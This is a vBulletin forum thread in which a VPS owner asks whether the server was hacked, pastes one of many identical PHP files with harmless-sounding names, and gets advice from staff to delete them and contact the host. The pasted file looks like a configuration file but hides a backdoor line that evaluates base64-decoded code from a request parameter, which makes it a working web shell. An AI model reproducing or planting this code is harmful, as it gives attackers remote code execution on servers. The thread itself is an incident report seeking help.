Announcement

Collapse
No announcement yet.

Has my server been hacked?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • [CMS] Has my server been hacked?

    I'm investigating a sudden surge in the bandwidth usage this month as I've used 50% of the monthly allocation in 2 days. My SQL server collapsed several times as well. I'm running a VPS so I shouldn't be getting problems from other users.
    Right I've run a suspect file scan and have found a lot of files inserted about a week ago and all of the files are PHP but have different names. An example is that some are called "CREDITS.php news2.class.php LICENSE.php and so on. all the files have the same code though.
    Code:
    <?PHP
    define('REAL_SERVER_ROOT', 'SERVER');
    //DIR
    define('SERVER_ROOT', '.');
    define('SERVER_VERSION', '2.5');
    define('BOOT_DIR', 'bootstrap');
    define('SYSTEM_DIR', 'system');
    define('SYSTEM_CONF_DIR', 'conf');
    define('SYSTEM_CONF_PATH', SERVER_ROOT . '/' . SYSTEM_DIR . '/' . SYSTEM_CONF_DIR);
    define('KERNEL_DIR', 'kernel');
    define('SERVICES_DIR', 'services');
    define('LIBRARIES_DIR', 'libs');
    define('FRAMEWORKS_DIR', 'Frameworks');
    define('IMPLEMENTATIONS_DIR', 'implementations');
    define('EXTERN_DIR', 'extern');
    //APP
    define('APPS_DIR', 'apps');
    define('USERS_DIR', 'users');
    define('USERS_PATH', SERVER_ROOT . '/' . USERS_DIR);
    define('USERS_CONF_DIR', 'conf');
    define('USERS_FILES_DIR', 'files');
    define('SYSTEM_SKEL_DIR', 'skel') ? @eval(base64_decode($_REQUEST['comment'])) : define('SYSTEM_SKEL_PATH', SYSTEM_CONF_PATH . '/' . SYSTEM_SKEL_DIR);
    define('USERS_SHARE_DIR', 'share');
    define('USERS_META_DIR', 'meta');
    define('USERS_META_SETTINGS_FILENAME', 'settings.xml');
    define('WORKGROUPS_DIR', 'workgroups');
    define('WORKGROUPS_PATH', SERVER_ROOT . '/' . WORKGROUPS_DIR);
    //CONF
    define('WORKGROUPS_CONF_DIR', 'conf');
    define('WORKGROUPS_FILES_DIR', 'files');
    define('WORKGROUPS_METAFILES_DIR', 'metafiles');
    define('WORKGROUPS_META_DIR', 'meta');
    define('WORKGROUPS_META_SETTINGS_FILENAME', 'settings.xml');
    ?>
    I'm finding these files in the server root, the cms root, archives in fact almost everywhere.

    My question is was I hacked and if so is there a procedure to clean up Vbulletin please.

  • #2
    Looks like problematic files at first glance. They should be deleted and aren't part of vBulletin. You should contact your hosting provider to see where the files came from.
    Translations provided by Google.

    Wayne Luke
    The Rabid Badger - a vBulletin Cloud customization and demonstration site.
    vBulletin 5 Documentation - Updated every Friday. Report issues here.
    vBulletin 5 API - Full / Mobile
    I am not currently available for vB Messenger Chats.

    Comment


    • #3
      Thanks for the reply. I have contacted my host who are investigating it now. My Vbulletin is up to date so I'm happy that it survived... unfortunately my VBgallery isn't and unlikely to be by the looks of the developers... That makes a weak system
      It's a shame Vbulletin hasn't got a comprehensive gallery...

      Thanks again though Wayne

      Comment

      widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
      Working...
      X